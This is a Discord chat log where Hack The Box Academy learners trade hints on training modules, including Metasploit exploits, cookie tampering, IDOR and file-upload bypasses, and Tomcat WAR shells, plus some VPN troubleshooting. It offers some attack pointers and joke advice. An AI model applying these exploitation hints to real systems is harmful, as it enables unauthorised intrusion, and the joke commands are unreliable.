#modules

1 messages · Page 525 of 1

upper vault
#

@mortal nebula You can get some cubes by completing other stuff first, check the HTB faq or forums, or ask a moderator about specifics

potent badger
#

I solved the problem just to let you know! ahaha thank you again

upper vault
#

@potent badger great!, np

cursive loom
#

lol...first post 😄 Doing the Linux Fundamentals module and since I've blown my 1 instance spawn for the day, I decided to use my Linux box and the OpenVPN file "academy.ovpn" but it would always bomb out with an error . I had to change "cipher AES-128-CBC" to "data-ciphers-fallback AES-128-CBC" in the ovpn file before it would let me in. Is this known?

upper vault
#

I've never run into that issue, although most of the time i haven't needed the vpn to connect to instances

#

what was the error?

cursive loom
#

1 sec...I'll paste it...

#

"Error: negotiated cipher not allowed - AES-128-CBC not in AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305"

#

This is the academy.ovpn file you download from the site. But without modification, it doesn't appear to work. I mean, I fixed it, I just wondered if this was a known issue

#

Not used OpenVPN before so that was a little adventure 🙂

upper vault
#

not known to me, but could be worth checking if others on the forum had the issue, and if so without help, you could paste your fix with your machine specs, could be helpful

#

Ya, i love openvpn, its great

cursive loom
#

Sure, will do 🙂

upper vault
#

👍

cursive loom
#

Er, could you point me towards the forum please? I don't see it listed in the FAQ

upper vault
cursive loom
#

Much obliged 👍

daring geode
#

Anyone here completed the cert ?

upper vault
#

not yet, bout 34% done

daring geode
#

How is it ?

upper vault
#

the bb course? great!

daring geode
#

Sweet, i'm in then 😄

#

Your word is good enough for me complete stranger from the internet haha

upper vault
#

Lol. you'll learn a lot, they've updated some stuff since i started, so im doing a refresher through what I've done already.

daring geode
#

great!

mortal nebula
#

Guys so i connected to the htb vpn with terminal but i don't know how to disconnect from it ? Should i even disconnect from it ? If yes why and how

raven cairn
#

Sudo apt install cowsay -y; Echo “Yayyyy” | cowsay

#

Do both of those and you should disconnect from the vpn

mortal nebula
#

what if i already closed the terminal ? :< (i actually closed the terminal becouse i thought that if i exit the terminal it will disconnect automaticly )

raven cairn
#

Sudo pkill -15 openvpn

#

Then repeat step 2 (important)

mortal nebula
#

bash: Sudo: command not found

raven cairn
mortal nebula
lethal atlas
#

Sudo killall openvpn also works

raven cairn
mortal nebula
#

still dont know how to close the vpn

raven cairn
#

Do lowercase sudo

lethal atlas
#

I gave you the command

raven cairn
#

👏don’t👏forget👏case👏sensitivity👏

lethal atlas
#

If you do ip a do you have tun0?

lethal atlas
#

Dm me

#

You used echo to copy the hash didn't you?

lethal atlas
#

UGH I do not understand what I am missing on this metasploit module. Anyone online that can help?

vital adder
lethal atlas
vital adder
#

you can use ||exploit/linux/http/elfinder_archive_cmd_injection|| with a 64 payload

lethal atlas
#

I thought I knew what they were trying to hint at but neither exploit works

#

Yeah, I tried it but let me try the payload

lethal atlas
upper vault
#

feeling dumb is actually just the feeling of getting smarter

lethal atlas
#

You would think as many modules as I have completed that I could pass a tier 0 mod without asking for help

vital adder
prisma coral
vital adder
prisma coral
#

sorry, specifically the Remote File Inclusion (RFI) page

vital adder
mighty pivot
#

Anyone good with the find command

#

Need to find the number of files that have .log extension

lethal atlas
#

@mighty pivot try find -type f -name *.log | wc -l

mighty pivot
mighty pivot
#

I was wondering if there’s duplicates I need to sort or something

wheat mica
#

hey guys, i'm new to linux, i recently downloaded the lubuntu 20.04 lxqt distro, and a few days ago, the sound stopped working, what should this bug be? I've tried several commands in the terminal and it didn't helpFeelsBadMan

polar widget
polar widget
lament charm
#

hi everyone, i need help on LFI module, basic bypass section

wheat mica
upper vault
#

sometimes you have to reinstall a couple times to get everything to work together. My most recent install on a hardware machine took 3 goes before everything worked like it should

#

If that doesn't do it, try a different version of the distro, and if not, a different distro

crimson atlas
#

Hey hey ! I would like a sanity check for Broken Auth skills assessments if possible

fathom bay
#

can anyone who completed the file upload attack module message me please? i have a question

hazy cradle
#

Module: Using MSF, chapter: "Writing and Importing Modules"

#

I downloaded "nagios3_command_injection.rb" and did reload_all

#

However, I am not able to use that module

#

┌──(kali㉿kali)-[~]
└─$ ls /usr/share/metasploit-framework/modules/exploits/unix/webapp | grep nagi
nagios3_command_injection.rb
nagios3_history_cgi.rb
nagios3_statuswml_ping.rb
nagios_graph_explorer.rb

hazy cradle
#

msf6 > use exploit/unix/webapp/nagios3_command_injection.rb
[-] No results from search
[-] Failed to load module: exploit/unix/webapp/nagios3_command_injection

lament charm
hazy cradle
#

sure..what do you need help with?

spare condor
#

Hey @west canopy ! I'm doing the Footprinting Lab-Hard.
I did connect through SSH, but can't figure out how to connect to the database. (access denied errors). Can you DM me for a nudge?
Edit: solved this.

pliant summit
#

hey guys im in the ffuf module and im doing the directory fuzzing section but my scan is taking significantly longer than shown in the module

#

in the module, it shows the scan compelted in 9 seconds while mine is taking much longer, what may I be doign wrong? i tried to up the threads to 50 as well

lament charm
lament charm
#

i send u dm

rustic sage
#

hi

#

how to hack

#

help me

pliant summit
#

that wasnt my question...

lament charm
pliant summit
#

you gave a completely unrelated answer to my question lol

rustic sage
#

my question!!

lament charm
rustic sage
#

how to hack something..

lament charm
rustic sage
#

for me know

rustic sage
ionic summit
#

Could I get a sanity check on the Broken Authentication module, Bruteforcing Cookies section? I am able to tamper with the cookie to change roles, but I keep getting the same message (no flag). I'd appreciate bouncing ideas off someone.

lethal atlas
#

Sorry thinking of another question

ionic summit
#

No worries.

lethal atlas
#

Which question are you on

ionic summit
#

It's question 1. I wrote a script that works (for tampering the cookie) but I'm wondering if I'm using the wrong name. May I message you to avoid spoilers here?

lethal atlas
#

Yes

cursive loom
#

I think I'm being thick or not giving the answer in the correct format for the question - I am doing the User Management part of the Linux Fundamentals module and I know my answer is correct but it's not having it

#

"Which option needs to be set to create a home directory for a new user using "useradd" command?"

#

I've tried "useradd -d", "-d", "--home-dir HOME_DIR", "useradd --home-dir HOME_DIR"

#

It doesn't like it 😛

cursive loom
#

Ah, no - I misunderstood the question 😄

ionic summit
#

Figured out my issue. At least the script worked. 😂

broken warren
#

Web attacks skill assessment, I found the IDOR and can change different users passwords to log in as them,, but none of the users seem to be admin. Not sure what to do here

acoustic owl
cursive loom
lethal atlas
wheat mica
#

what do you think of the ice dragon browser?

broken warren
lethal atlas
hollow hinge
polar widget
#

Which module shall I do next
Recently completed hacking wordpress

#

I welcome suggestions

raven cairn
polar widget
#

Stuck on linux privilege escalation one
Would revisit it soon

west canopy
#

@polar widget which section are you stuck on?

lethal atlas
#

@polar widget that depends on what you have done already

polar widget
#

The one which involves something around exploiting apache tomcat , as far as I remember

west canopy
#

if you look in /etc/tomcat9 there are credentials hidden in a config file

polar widget
#

No wait wait a second
That credential hunt already happened

#

Like we did hunt and SSHed of SUed

#

Switched to another user

#

Aaa, I had worked on that one some 15 days ago :/

lethal atlas
polar widget
#

Aight 🎉

lethal atlas
#

can someone tell me why my metasploit says db not connected.?

west canopy
#

@lethal atlas I'm not sure, something similar happens on my 2019 kali image. But if i launch Metasploit from the shortcut on the toolbar , it seems ok.

cursive loom
#

metasploit uses PostgreSQL no? Checked the DB service is running?

lethal atlas
#

yes and it is

#

nm think I found the issue

cursive loom
#

Weird - I get similar behaviour

#

Well, similar but worse behaviour 😄

raven cairn
cursive loom
#

This works from the cli: - "sudo msfdb init && msfconsole"

lethal atlas
#

I can init the db but get this error

cursive loom
#

I'm pure guessing here, but "sudo msfdb init" is obviously starting some service prior to the msfconsole - without it, the DB won't connect, so that's how the GUI version is starting some database service prior to trying to connect to it with msfconsole.

#

Presumably some on-the-fly postgres instance or something

wheat mica
lethal atlas
wheat mica
#

but for those who are new to linux, it gives a headache

lethal atlas
#

that can be true but after using it for awhile I prefer it. Only downside is gaming but that is changing all the time

cursive loom
#

Windows for desktop, Linux for servers. Although I did Linux exclusively for, like, 10 years and it was fine - switched to Windows for VR development (Linux VR support is still shakey)

#

Aha, "sudo msfdb init" ..."creates and initialises the msf database" - so reckon I was right. Must create it on the fly

lethal atlas
#

still doesnt let me connect to the db.

cursive loom
#

Does "sudo msfdb init" state that it's running?

lethal atlas
#

yes

cursive loom
#

And just doing "msfconsole" gives you the not connected error from here?

lethal atlas
#

no msfconsole works fine. its only when trying to use something like db_nmap that the errors appear

cursive loom
#

Yeah, cos the db instance isn't connected for some reason, won't show until you try a query. Whelp, that's all I got 🙂 Works for me, I just tried to replicate it with db_nmap query also

lethal atlas
#

well it does NOT work for me

cursive loom
#

Indeed. But it will work from the UI?

lethal atlas
#

not the db_nmap

#

nothing related to a database works. but I can use msfconsole normally

rustic sage
#

Looking for help with the Whitelist Filters section on the file upload attacks module, DM if you can lend a hand

boreal sun
#

anyone else doing the bloodhound module? ive gotten all of the last questions sorted except for the last where legit no matter what i do, i get a "no data returned from query"

#

wondering if anyone else ran into the issue - ive rebooted the pwnbox, verified that query should be working, but still no luck

boreal sun
upper vault
#

ive heard a bunch of people have issues with the bloodhound module

boreal sun
upper vault
#

aha

boreal sun
#

oh well - onto powerview and im done with the AD module

#

just in time for PNPT!

upper vault
#

woo!

blissful verge
boreal sun
frozen dock
#

first hour on htb, is the only way to get more cubes for tier 1 modules by buying them?

#

@blissful verge

coral heath
#

Hi all, I just need some help with Web Attack IDOR part where mass IDOR Enumeration secion

west canopy
#

I think the fundamental modules refund your cubes, but it's never a net gain so you will eventually need to buy cubes

coral heath
#

could someone please me?

west canopy
#

@coral heath what are you having trouble with? I think I just fuzzed uid's in burpsuite until i found the flag

coral heath
#

so not sure if the parameter is correct

west canopy
#

It's a number less than 20

coral heath
#

Yes did. Just wondering if I can PM you...?

lethal latch
#

Could someone point me in the right direction on the broken authentication skill assessment? ive figured out how the cookies are encoded and enumerated a couple of accounts and can access them through changing the cookies, but i dont know where to go from here
and of course i got it immediately after

west canopy
twin gulch
#

Guyssss

#

Hey

#

Need you asap. I’m in module of privilaged groups. Just entered the root user but cannot find the flag. It says that I need to check the users special privileges but I cannot perform sudo -l inside ssh…

#

?

west canopy
#

Sorry, which module/section do you need help with?

umbral yacht
#

Hello. I need help with the "Using Metasploit Framework" module. The questions is "Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer." I've run the exploit but no session is created so how can I go about finding the flag? Please DM me if you can help. Thank you!

polar widget
knotty falcon
#

I'm hoping someone can help me out with the Broken Authentication Skills Assessment.
I think I'm in the final stages but can't elevate a user to reach the admin panel. Please DM if you can help out, thank you.

twin gulch
west canopy
#

sec i will DM you

#

@knotty falcon were you able to get logged in as the support user? Try manipulating the cookie

knotty falcon
# west canopy sec i will DM you

Yes I did. I assumed the next step was t||o alter the the support user's rememberme cookie or the sessionID ||to elevate their privs, but it never worked out. Am I on the right path or should I try something else?

west canopy
#

@umbral yacht did you remember to set the LHOST?

grave harness
#

how to Learn hack can someone explain me where to start in this server

woven copper
coral heath
#

Could someone please help me with Web Attacks skill assessment part? I've managed to get the admin user but the only function I can see is change the password but Access denied.

coral heath
#

I also have the token right... but still Access denied

acoustic owl
# grave harness how to Learn hack can someone explain me where to start in this server
acoustic owl
grave harness
#

@acoustic owl thanks brother but what are applictio we used for hacking in window

#

@acoustic owl accept req for future doubts thansk

#

@surreal rain from where to take roles

acoustic owl
mighty pivot
#

In the intro to networks when it says /24 means that the first 3 octets are the same, does that mean the first digit of the first 3 numbers in an address? Like if it was 150.150.150.150 for example, the octets they reference are the “1” at the start of each number?

grave harness
mighty pivot
#

This is what I’m referencing by the way “The /24 network allows computers to talk to each other as long as the first three octets of an IP Address are the same (ex: 192.168.1.xxx). “

woven copper
mighty pivot
#

Because that’s the only same number I see

acoustic owl
woven copper
#

the first octet its 192 , second 168, third is 1
if you pass to binary 11000000. 10101000 . 00000001 . xxxxxxxx

mighty pivot
acoustic owl
woven copper
#

the first 3 octets are the same , but you have 4 octets in all IPv4 addr, so what change are that 4 octet
from 192.168.1.1 to 192.168.1.255 , were address that belong to 192.168.1.0/24

mighty pivot
grave harness
#

there i am new can tell every step day by day

#

@@acoustic owl

grave harness
#

@acoustic owl can you put my nickname Thory007

acoustic owl
umbral yacht
grave harness
#

@languid dawn hey can you change

languid dawn
#

please don't ping everyone...

#

you can follow the instructions on #welcome to get your HTB account name

gleaming kestrel
#

In the exercise "Attacking Web Applications with Ffuf", there is a question to scan subdomains to find subordinate Vhosts to 'academy.htb'. I've run the ffuf command, got a (small) number of vhosts (let's call them 'alpha', 'bravo', 'charlie' to avoid spoilers, and there may be more or less than 3). My problem is that I don't quite know what sort of answer is expected. If I enter 'alpha.academy.htb bravo.academy.htb charlie.academy.htb', I get "wrong answer". I don't want anyone to tell me the solution: but can someone indicate if my format of answer is right?

languid dawn
#

otherwise you can also just change your name to something with only ascii chars and rejoin the server 🙂

#

we don't accept non-ascii names here

rustic sage
#

yaya pentest module finished

grave harness
#

k

gleaming kestrel
autumn hill
#

Why am I not able to connect to a target machine on academy? Im using my own computer but I have a running openvpn connection using the file I downloaded(the vpn key)
smbclient connection to failed (error nt_status_host_unreachable)

torpid imp
#

Hey guys, is there somewhere a walkthrough for SQLmap essentials ? I worked through 12 modules but I am completely stuck on this one. I dont understand what they want from me. I completed all other modules for the Basic Toolset.

ionic summit
lament charm
plush falcon
#

Hey got a question about the dcsync section of the AD-enum and attacks module. Having trouble to use secretdumps

vale salmon
#

Good morning/afternoon. In the Getting Started Module, I am struggling with the privilege escalation. I can get connected to the target as user1 and I can switch to user2, but for the life of me, I can't figure out how to escalate my privilege to root. I keep seeing alot about using a privesc exploit and enumerating the target, but everything seems to need to be run from the target system and I can't figure out how to get things there to run them, due to lack of root access.

acoustic owl
velvet pine
#

hello

vale salmon
#

I'm not sure I understand, if that is necessary, why that section comes well after the Privilege Escalation section

acoustic owl
#

Hmm? It is described in the Privilege Escalation section.

vale salmon
#

You looking at that under Getting Started -> Privilege Escalation? Because it doesn't say that anywhere on mine.

acoustic owl
#

I just see there is a Privilege Escalation page and a Nibbles - Privilege Escalation page.

vale salmon
#

This is what I see, but Privilege Escalation is well above the Nibbles. This is why I'm a bit confused.

acoustic owl
#

Yes exactly, my mistake.
I thought you were at Nibbles.

ionic summit
#

Anyone available for a nudge on the Broken Authentication skills challenge?

marble tinsel
#

Someone made the File Inclusion -> Automated Scanning? Somehow it doesn't work

west canopy
#

@marble tinsel first we have to fuzz the parameter name , then we fuzz for the value. If you need help feel free to DM me 🙂

#

@torpid imp feel free to DM if you still need help with SQMap 🙂

limpid wharf
#

Question: Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)

limpid wharf
limpid wharf
acoustic owl
rustic sage
#

Still looking for help with the Whitelist Filters section on the file upload attacks module, DM if you can lend a hand

west canopy
#

@limpid wharf it should save the output to a file

limpid wharf
#

i dont understand why mine wont save. tried setting a new file path still the same result

forest gorge
#

hi I have a question in the "File Upload Attack" course, I am at the "Blacklist Filters" section, I could'nt find the answer to the qestion, when i upload a file it display the source code and won't execute it...

#

Can I ask someone ?

hollow notch
#

Hey guys! I finished the module Web Requests. It was all good except for the optional exercise at the last section CRUD API. Adding a new city via curl -X POST was good. But how to do the following I couldn't get - Exercise: ~Try adding a new city through the browser devtools, by using one of the Fetch POST requests you used in the previous section~. I'd appreciate your help. My head won's stop pounding until I get this.

upper vault
#

@hollow notch I got stuck on that for a second too, couldn't leave it alone and spent an afternoon fiddling with it

#

@hollow notch So you're creating a Fetch POST request, since there's no POST method on this challenge, go back one and copy/pasta that Fetch POST, then modify it for the new one

west canopy
#

@hollow notch try deleting HTB_City and New_HTB_City, then rename a city to "Flag" and curl it

hollow notch
upper vault
#

@hollow notch i'll pop back real quick and see what i did

#

@hollow notch shoot me a DM so we don't have to clog chat

coral heath
#

Could someone please help me with the Running SQLMap on an HTTP Request second flag in SQLMAP Eseentials?

raven cairn
#

Could I have a nudge on the web proxies skill assessment?I'm pretty sure I am using the correct payload processing settings in Burp intruder

west canopy
#

@raven cairn DM me

lyric echo
#

Hey! Could someone help me understand how to answer the questions using vHosts app.inlanefreight.local and dev.inlanefreight.local in the "Information Gathering - Active Infrastructure Identification" module?

west canopy
#

@lyric echo you want to add them to your /etc/hosts file, and then you can curl them

lyric echo
west canopy
#

np 🙂

brazen hinge
#

did anyone finish Web Service & API Attacks - Skills Assessment? I know about the ExecuteCommand Spoofing, but the challange said that it must be achived through SQLi, and if i try to spoof Login SOAP action, the server hang

brazen hinge
#

but i can't interact with SOAP action 'Login', the server hang on, im trying from python requests

brazen hinge
plain coral
# raven cairn Could I have a nudge on the web proxies skill assessment?I'm pretty sure I am us...

If you're using the correct payload processing settings then the flag should be at the bottom of the response in the results of the Intruder attack. Also, since your only fuzzing one character, and your encoding it twice to get a cookie similar to the original result. The position in Burp that your fuzzing ought to resemble what you need to fuzz, as the cookie value is added and processed as a prefix, there shouldn't be duplication in the position.

summer prism
#

While doing HTB module "Footprinting" im stucked in SMB, the last question says What is the full system path of that specific share. I'm unable to find the path any hints?

west canopy
#

@summer prism try connecting with rpcclient and then netshareenumall

summer prism
#

just had to write here and suddenly got a solution in my mind, worked

#

thanks

west canopy
#

np !

lethal latch
#

could anyone dm me about the Web Service & API Attacks skill assessment? im so very lost

summer prism
#

I need a little help enumerating SMTP users, the only way i know off is using metasploit but the module hasn't discussed that method yet

west canopy
#

@summer prism is this footprinting?

summer prism
#

yes

#

I've found the username using metasploit, just curious if there's another way out

west canopy
#

I had to use metasploit as well, smtp-user-enum was the other tool i tried and it didn't work

half quest
#

Hey!
So I'm connected to the academy VPN and I'm trying to scan a target from my kali. The Target IP is from Getting Started academy module and it's not working.
Am I missing anything?

west canopy
#

If it's a docker target you probably can't ping or nmap it

#

or if you nmap it will only have the one port open

half quest
west canopy
#

so this is a docker target

#

try just navigating to it in your browser

half quest
west canopy
#

you're welcome 🙂

pliant summit
#

hey guys for attacking web applications with ffuf, in the GET section, how can I know the port and IP of admin.academy.htb?

#

i know academy.htb IP and port is the one given in the instance on the bottom section

#

but after finding the admin.* subdomain, not sure what its IP is so i can't save it to /etc/hosts

acoustic owl
pliant summit
#

in my case, i have the IP of academy.htb saved in my /etc/hosts file and it works when i navigate there with the port, but when i go to admin.academy.htb:PORT it gives me an error on the webpage

acoustic owl
pliant summit
acoustic owl
#

The same IP from the target computer

pliant summit
#

what about port?

acoustic owl
pliant summit
#

ok thanks

sweet heron
#

On penetration testing process module, post-engagement section, what does PCI DSS stands for. Why is this answer wrong?

acoustic owl
sweet heron
#

Thanks!!

scarlet sapphire
#

hi in Pivoting, Tunneling, and Port Forwarding module i have a problem with chisel i uploaded it tried to run it and with sudo but it give this error "./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)" i have try the --reverse but i have the same error

blissful verge
plush falcon
#

Hey got a question about the dcsync section of the AD-enum and attacks module. Having trouble to ssh into the host

undone crescent
#

Anyone available for a nudge on the Broken Authentication skills challenge pls?

marble tinsel
#

hey i am currently doing the File Upload Module (Blacklist Filters)

Whats wrong? Some .php files get uploaded but its not a real web-shell :/ (using the SecLists web-extension.txt as a wordlist)

misty thistle
#

for this question, is this asking to get all the href links? I don't understand what the question is asking for:
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

rich mulch
#

Hello guys,
I am doing Linux Local Privilege Escalation Assessment. Even I gain root, but I cannot find flag1.txt

So how to find out flag1.txt

misty thistle
#

if you have root, it should be in the root home folder /root/

#

also if you know it's named flag1, you can use find, or possibly locate

#

0.o okay yeah that's a tad weird, maybe it's a hidden file or something, not sure on that one

marble tinsel
#

Maybe try "*flag*.txt"?

rich mulch
marble tinsel
#

Nice 😄 So it's because it is a hidden file

rich mulch
#

yaya

plain coral
#

ls -a (the option a will show the hidden files).

misty thistle
#

find typically will as well but the caveat is that the leading '.' has to be captured by the regex

marble tinsel
#

Is there someone completed the File Upload Module ? :/

rich mulch
#

done. Thanks for reminding me

quiet prism
#

can someone help me with password bruteforcing. I'm on the first skills assessment part.

#

did a brute force, it gave me a username and password, but now doesn't work

#

gives me a different name everytime xD

misty thistle
#

can you show me what you're returning? that doesn't sound right lol

#

you can dm me so there's no spoilers if you want

quiet prism
#

will do now yeah

grand cloak
#

did hackthebox have some major update recently?

#

i remember visiting the site 2yrs ago and most things used to be paid, writeups werent available for free machines and to join you had to do a little puzzle

#

all that is gone now?

wheat garden
wheat garden
quiet prism
grand cloak
lethal latch
#

is anyone around to give me a hint on the web service and api attacks skill assessment? i feel like im missing something obvious

wheat garden
# grand cloak ah so the things i said, those are completely gone now?

There is free and non free machines. The VIP machines haft to be paid but you'll have full access to free machines.. Im relatively new to hack the box so I have no reference for the good ol days, Though id think there's a lot more features now and there's also hack the box academy. Which has step by step courses in different cyber security subjects.

grand cloak
#

Thanks for the update 👍

wheat garden
# grand cloak I see

hack the box academy is a completely different site from hack the box. But they're complementary. Hack the box will sometimes suggest academy modules that will give you knowledge to pwn a particular box and after completing academy modules it will recommend some boxes that utilize some the skills in the course you just took.

grand cloak
#

it seems promising

quiet prism
#

yeah i thought it was my boolean fail/success string but i don't think it's that now. i'm stuck

#

for sure

lethal latch
lethal latch
quiet prism
lethal latch
#

Thank you! Here's to hoping to exam goes well 😬

young sleet
#

can anyone help me with this?

young sleet
rich mulch
#

Hello guys,
I stuck at flag4, Linux Local Escalate Privilege assessment
Any more hint?

knotty falcon
ionic summit
young sleet
rich mulch
#

I know the external service is tomcat, but dont still get how to get password of user tomcat

#

tomcat version 9, I cannot find any good exploit for this

#

I also try default creds but cannot

#

ah i got it

quiet prism
#

anyone available to help me out with the brute forcing passwords skills assessment? i'm getting different usernames/passwords everytime and none of them work xD

#

it's always one of the first names/passwords on the list

#

i've got my theories and i want to hash it out with someone and avoid spoilers in this chat

coral heath
#

could someone please help me with sqlmap essential module..?

summer prism
#

What is the customized version of the POP3 server?, Footprinting module. I was able to get the version but HTB won't accept it

west canopy
#

@rich mulch tomcat credentials are hidden in a log file, once we get logged in to tomcat we can upload a malicious WAR file to get another shell and ultimately reach the final flag

#

@summer prism try running: nmap -A --script=banner <ip address>

hexed tartan
#

if anyone have done information gathering module please dm me

hexed tartan
upper vault
hexed tartan
summer prism
#

I need a little help regarding reading emails using curl, i'm stucked in trying to read emails using curl

upper vault
#

@summer prism found this https://everything.curl.dev/usingcurl/reademail, if you're trying to read emails in exchange, or gmail, or something you'll probably have to do some research on it, or check the relevant APIs for each to see if its possible

left saddle
#

Good evening! Trying to wrap up the hashcat module in Academy, and having challenges with the Academy module, as the module was written for deprecated utils/hashcat plugins, and the new cap2hccapx will not create hashes in the necessary format, anyone familiar with how to get the hccapx format out of the cap file? 😮

upper vault
#

there's a hashcat mod? nice!

left saddle
#

Yep - it's not part of the free Academy stuff though... think it's Tier II

#

It's been really useful up to this point.. but I've been trying to get the conversion right for over an hour and a half

#

there is an online tool from hashcat that will do the conversion right.. .but, I want to learn how to do it offline, and the module just basically says "The tools we use are deprecated, you should use new tools"

upper vault
#

pay to win baby! Don't know if it helps, but have you tried using John to make the hash? apparently its easier, had to make one from a zip earlier today.

left saddle
#

If I knew how to use the tools.. I wouldn't be taking the module 😮

#

that is working.... but i've downloaded and compiled hcxpcapngtool .. and it spits out garbage (or errors out on the same file).

#

I have a newer version than the one on that page too.. it would make sense if the webpage had a newer version.. but doesn't seem like most tools regress capabilities when they get updated 😛

upper vault
#

lol. Ya sry im no help, but could be worth msging the dev team, seeing if they know a solution that fits your needs, plus you could chat them up about how their software works, etc.

#

maybe even write up your own tooooll?? *wink wink

left saddle
#

The hashcat dev team... or the module developer.. would think HTB would like to make their modules up to date with working / latest tools?

#

if I had the skills to write my own tools.. I wouldn't be taking HTB Academy modules.. 😐

upper vault
#

Ya they try, it's alot to keep updated, especially in the sec field

left saddle
#

totally understand.. been in the field for a while (30 years :o) - hence why I'd like to provide feedback.. was kinda thinking this might be the dc channel to do that.. maybe not though.

#

really appreciate the chat though.. I thought maybe I'd get crickets in the chan anyway

misty thistle
#

lol just feeling spicy this evening or something?

#

so contentious. or maybe it's just my reading lol

left saddle
#

nope, might just be your reading.. don't think i'm being spicy... or maybe I am 🤷‍♂️

#

not intentional, if so 😮

#

I could just use the file that the website handed me.. but I'd really like to understand how to use the tools on my own....

upper vault
#

nope, didn't get that impression

prisma kettle
#

@lethal atlas Have you figured out how to solve the Trick?

upper vault
#

@left saddle so is the challenge using hashcat to break wpa/2 keys?

left saddle
#

yep

#

they give you a pcap file.. which has a whole bunch of integrity issues it seems

#

but works when passing it through the online site, but not when passing it through the same util I converted.

#

probably likely I'm doing something wrong

#

but 🤷‍♂️

upper vault
#

I'm trying to remember the last time i cracked a pcap, I was playing with capturing wifi packets, that whole thing, and it did the work locally, oh ya, aircrack

#

if the pcap is corrupted i guess it wouldnt help

left saddle
#

yeah.. apparently there is a new hashcat mode .. so it's not 2500 anymore it's 22000

upper vault
#

but it does a fine enough job of cracking, it might be slower than hashcat

left saddle
#

yeah.. I've thought of using alternate tools.. it's really about learning hashcat though 😮 lol

upper vault
#

Well, right tool right job i guess, it'll crack it locally, so thats a plus, but ya if hashcat is being a pain then that's that 😛

left saddle
#

yeah.. I'm sure it's just me doing something wrong, hoping to learn the right way to do it though, vs. just grabbing the file that got spit out of the website.. this is probably why these modules take me so long.. I want to learn the stuff, not just get the flags.. heh

#

again, appreciate the chat though... i'll just keep digging at it

upper vault
#

kk, gl with it.

left saddle
#

figured it out! the help is pretty crappy on the file

upper vault
#

what's the fix?

left saddle
#

part of it was that I was having issues with my terminal emulator on my mac :P. It was only printing half of the help file.. so I was not seeing any options that made any sense.

upper vault
#

Ahaa, well glad you figured it out

left saddle
#

had to use the -o option to output in the file format for hashcat 22000

#

which seems almost obvious.. but there was no -o option in my help output 😐

#

so, this is what cracking passwords is like IRL anyway, you spend hours working on something, only to find you missed a single char in your format or rule. 😛

#

LoL

#

took 1 sec to crack

upper vault
#

lol. yup, probably pretty close to reality.

left saddle
#

took ~1.5 hours to figure out what command line to use

upper vault
#

😆

left saddle
#

and now.. as a reward, I get +1 cube!!! MarioWooDance

upper vault
#

What i love about that though, is that it made such an impression that next time around it'll be way easier

left saddle
#

nod that's whY I wanted to know how to extract the hashes myself.. heh

dreamy cargo
#

hi

polar widget
#

We can use burp suite too, works like a charm
Zap is zap ⚡

upper vault
#

I purposely did the Burp mod twice, once in burp and once in ZAP so I had a working familiarity with both. I do like that ZAP is an open community tool

#

plus the Hud is cool, makes me feel like im in a cockpit or mechsuit or something

west canopy
#

Anyone able to give me a nudge on Password Attacks: Credential Hunting in Linux?

Edit: SOLVED!

upper vault
#

@west canopy no idea here, haven't done it yet. Guessin' its more compilcated than linPEAS and gtfobin?

#

@west canopy or is it some kind of bruteforcing thing?

west canopy
#

yea, bruteforcing + enumerating the file system to look for credentials

upper vault
#

do you have a user shell? if so what're the sudo permissions? any suid root stuff?

quiet prism
#

anyone available to help out with the academy module login brute forcing: skills assessment: website? i'm on the second question

west canopy
#

@quiet prism DM me 🙂

pliant summit
#

hey guys im in last section of the attacking web apps with ffuf module

#
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30556/

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.4.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : https://FUZZ.academy.htb/
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

:: Progress: [4989/4989] :: Job [1/1] :: 956 req/sec :: Duration: [0:00:06] :: Errors: 4989 ::
#

for some reason, i get all errors when i simply try to find subdomains, what am i doign wrong?

vast geyser
#

Hi guys,Could someone give me some hint about COMMAND INJECTIONS-Skills Assessment?
I can't bypass ;

fathom bay
#

anyone avaible to help me with the file upload > type filters?

jolly glen
copper sparrow
#

hi, i've a problem with https://academy.hackthebox.com/module/35/section/227
i've updated all cities name to flag as requested then i've deleted all cities but when a search for a city named flag just []output from vm
i've done a script with 2 for , one for update the name to flag and the second one for delete all cities
both operations worked fine, names was updated to flag
and all cities was deleted

barren stone
#

I feel like an idiot in the Windows Fundamentals portion. I feel like I have no idea what is going on and I am completely lost in the Skills Assessment. Does anyone have any recommendations on a lighter approach for understanding Windows? I am comfortable with Linux and Mac, I don't have much experience with Windows. I need help. 😫

iron plaza
#

Hey anyone finished the Vulnerability Assessment module? I have completed all the questions in the Nessus Skills Assessment but stumped at the first question: "What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)" any hint or guidance will be welcomed

rustic sage
#

Can anyone give a nudge with Bypassing other blacklisted characters?

#

I am not getting an error just blank responses

#

nevermind found it

young sleet
#

Module : Using Metasploit Framework
Sub : Sessions
I've been stuck on this since yesterday please if someone could guide me a bit

rich mulch
#

====
Hi I cannot connect to htb-ovpn. How to slow this issue?

copper sparrow
#

@rich mulch open vpn 2.6?

rich mulch
#

yes

copper sparrow
#

change cipher AES-128-CBC

#

to data-ciphers AES-128-CBC

rich mulch
#

change in which file?

copper sparrow
#

if you've issue with ipv6 route

#

pull-filter ignore "route-ipv6"
pull-filter ignore "ifconfig-ipv6"

#

in your config of academy-regular

copper sparrow
rich mulch
#

should I change both line 12 and 13?

copper sparrow
#

try to comments both lines

#

add only data-ciphers AES-128-CBC

rich mulch
#

done

#

it shows up errors as above image

copper sparrow
#

add filter for ipv6 as i wrote

#

